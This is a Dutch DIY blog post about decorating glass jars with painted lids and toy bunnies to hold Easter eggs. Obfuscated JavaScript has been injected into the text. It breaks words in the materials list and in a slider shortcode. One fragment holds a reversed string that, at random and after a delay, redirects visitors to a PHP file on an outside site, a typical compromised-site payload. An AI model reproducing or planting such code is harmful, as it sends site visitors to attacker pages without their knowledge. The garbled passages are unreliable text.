Paaseitjes DIY voorraadpot

Maak zelf je eigen voorraadpot voor je paaseitjes. Het enige wat je nodig hebt zijn wat glazen voorraadpotten met deksel, wat verf in een vrolijke pasteltint en wat kleine plastic speelgoed konijntjes. Wil jij weten hoe je dit kunt maken? Lees dan snel verder!

Wat heb je nodig?

 • Glazen voorraadpotten. Je kunt hier heel goed lege groentepotten voor gebruiken. Vooral appelmoes potten doen het goed, die zijn vaak ook wat groter.
 • Verf in pastel tinten
 • Secondelijm
 • Plastic speelgoed konijntjes. Je kunt deze bij heel veel winkels kopen. Niet alleen van plastic, maar ook van steen of sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tof. Online heb ik ze gevonden in een folder van de action.

Aan de slag!

 1. Zorg dat de glazen potten goed schoon en steriel zijn gemaakt.
 2. Je kunt op de bodem van de glazen potten als je wil nog iets van decoratie leggen. Bij de IKEA hebben ze dit in grote zakken, maar je kunt ook gewoon wat vrolijk cadeaupapier in reepjes snijden.
 3. Verf de deksels en de konijntjes in een vrolijke pastel kleur.
 4. Laat de deksels en de konijntjes goed drogen
 5. Lijm vervolgend het konijntje op deksel. Let goed op dat je hem goed in het midden van de deksel lijmt.
 6. Laat goed drogen.
 7. Vul de voorraadpotten vervolgens met paaseitjes.
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”3″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”” wrap=”yes” img_size=”500×500″]

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Paaseitjes DIY voorraadpot"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.